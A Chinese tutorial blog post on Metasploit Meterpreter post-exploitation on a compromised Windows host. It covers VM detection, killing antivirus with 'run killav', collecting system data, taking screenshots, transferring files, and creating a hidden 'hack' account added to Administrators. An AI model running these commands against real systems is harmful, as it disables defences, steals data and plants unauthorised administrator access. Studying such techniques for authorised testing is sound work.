查看主机是否运行在虚拟机上

run post/windows/gather/checkvm


关闭杀毒软件
拿到目标主机的shell后第一件事就是关闭掉目标主机的杀毒软件,通过命令

run killav


获取目标主机的详细信息

run scraper

它将目标机器上的常见信息收集起来然后下载保存在本地

Meterpreter支持非常多的文件系统命令(基本跟Linux系统命令类似),一些常用命令如下:

pwd:当前所在位置
ls:获取当前目录下的文件
cd:切换目标目录;
cat:读取文件内容;
rm:删除文件;
edit:使用vim编辑文件
mkdir:新建目录;
rmdir:删除目录;所在位置





upload file 命令则能够向目标系统上传文件。



download file 命令可以帮助我们从目标系统中下载文件


屏幕截图

screenshot

截图目标主机屏幕,可以看到,图片被保存到了/root 目录下


查看目标主机有哪些用户

run post/windows/gather/enum_logged_on_users


可以在目标系统中创建一个新的用户账号

run getgui -u hack -p qwe

这个命令会创建用户,并把他添加到 Administrators 组中,这样该用户就拥有远程桌面的权限了。这里成功创建了用户,但是添加到Administrators组中失败了 !
如果添加到Administrators组中失败了的话,我们可以运行:shell,进行cmd窗口手动将该用户添加到administrators组中。


查看系统用户组

net localgroup

administrators即为系统管理员用户组,只需要将添加的用户加入到管理员用户组即可。

将hack用户添加到管理员用户组。

net localgroup administrators hack /add

Metasploit--后渗透(一些基本操作方法)相关推荐

  1. [系统安全] 四十五.APT系列(10)Metasploit后渗透技术信息收集、权限提权和功能模块详解

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  2. [网络安全提高篇] 一〇三.Metasploit后渗透技术之信息收集、权限提权和功能模块

    当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...

  3. Metasploit——后渗透测试阶段

    目录 1.已经获得目标系统控制权后扩大战果 2.基于已有session扩大战果 3.获取system账号权限 4.绕过UAC限制 5.利用漏洞直接提权为system 6.图形化payload 7.Ps ...

  4. 内网渗透-Metasploit之——基本后渗透命令

    Metasploit之--基本后渗透命令 文章目录 Metasploit之--基本后渗透命令 前言 1.帮助菜单 2.后渗透命令 3.机器ID和UUID命令 4.通信信道的操作 5.获取用户名和进程信 ...

  5. metasploit完整的使用流程包括meterpreter后渗透

    metasploit完整的使用流程包括meterpreter后渗透 主机发现 基于ARP发现内网存活主机 基于FTP服务 基于HTTP服务 基于SMB 漏洞扫描 漏洞渗透利用 利用ms17_010 利 ...

  6. Metasploit的简单木马免杀技术及后渗透面临的问题

    一. 配置ngrok准备内网穿透 内网穿透的必要性和原理就不用说了,直接说操作.首先到ngrok官网去注册一个号,国内也有一个sunny ngrok,但是我用了几次全失败了,所以推荐国外的,网址是:h ...

  7. iOS macOS的后渗透利用工具:EggShell

    EggShell是一款基于Python编写的iOS和macOS的后渗透利用工具.它有点类似于metasploit,我们可以用它来创建payload建立侦听.此外,在反弹回的session会话也为我们提 ...

  8. Metasploit之渗透安卓实战

    Metasploit之渗透安卓实战 在之前的Metaspoloit使用中都是在Windows系统中,因为渗透的是Windows系统,所以选用了"windows/meterpreter/rev ...

  9. MSF(六):后渗透

    后渗透测试 安全牛学习Metasploit Framework笔记 一.已经获得目标系统控制权后扩大战果 (1)提权 (2)信息收集 (3)渗透内网 (4)永久后门 二.基于已有session扩大战果 ...

  10. 后渗透后门_TheFatRat:Msfvenom傻瓜化,小白也可以学渗透

    在这篇文章中,我将教大家如何使用TheFatRat这款工具.这款工具可以帮大家构建后门程序,以及执行后渗透利用攻击等等.在主流Payload的帮助下,这款工具可以生成质量非常高的恶意软件,而这些恶意软 ...

最新文章

  1. 697. Degree of an Array 频率最高元素的最小覆盖子数组
  2. 雅思听力的词语练习打字!!!
  3. 礼物(中国剩余定理+拓展gcd求逆元+分治=拓展Lucus)
  4. UE4 多线程使用tip
  5. 币氪研报|BNB(Binance Coin)
  6. 如何测试一个数组是否包含指定的值
  7. 用命令来操作vSphere:二十二 PowerCLI命令--虚拟主机操作(1)
  8. 弹簧优化设计MATLAB,基于MATLAB的弹簧优化设计.pdf
  9. Linux文字识别软件,Ubuntu 14.04下PDF 文字识别工具gscan2pdf
  10. 这应该是史上最强的物理学科普(雄文)
  11. 一文简要了解词义消歧与实体消歧
  12. xubuntu12.04配置
  13. Gartner:新兴技术成熟度曲线2018(中文—历年)
  14. uni-app 打开第三方程序
  15. SKNet: Selective Kernel Networks
  16. Excel数据透视表之多重合并
  17. HTML5期末大作业:在线电影网站设计——我不是药神电影介绍(4页) HTML+CSS+JavaScript 大二实训大作业HTML源码...
  18. 动漫剪纸可爱粉星空专用PPT模板分享
  19. 巧用Option键,提升Mac工作效率(二)
  20. 连续梁混凝土徐变次内力(想了好久orz)

热门文章

  1. 在厚度仅十几微米的电池隔膜找缺陷?人工智能说,能行(人工智能应用案例)
  2. Java集合(5)--Set接口及其实现类HashSet、LinkedHashSet和TreeSet
  3. Java学习、简单代码编译
  4. linux内存不足时缩减缓存,Linux内存及页面缓存管理概要总结
  5. 博客园背景设置CSS代码
  6. 制造业物料清单BOM、智能文档阅读、科学文献影响因子、Celebrated Italian mathematician ZepartzatT Gozinto 与 高津托图...
  7. 合并两个排序的链表递归和非递归C++实现
  8. python_fullstack基础(十一)-常用模块
  9. 核心动画与UIView
  10. [水煮 ASP.NET Web API2 方法论](1-6)Model Validation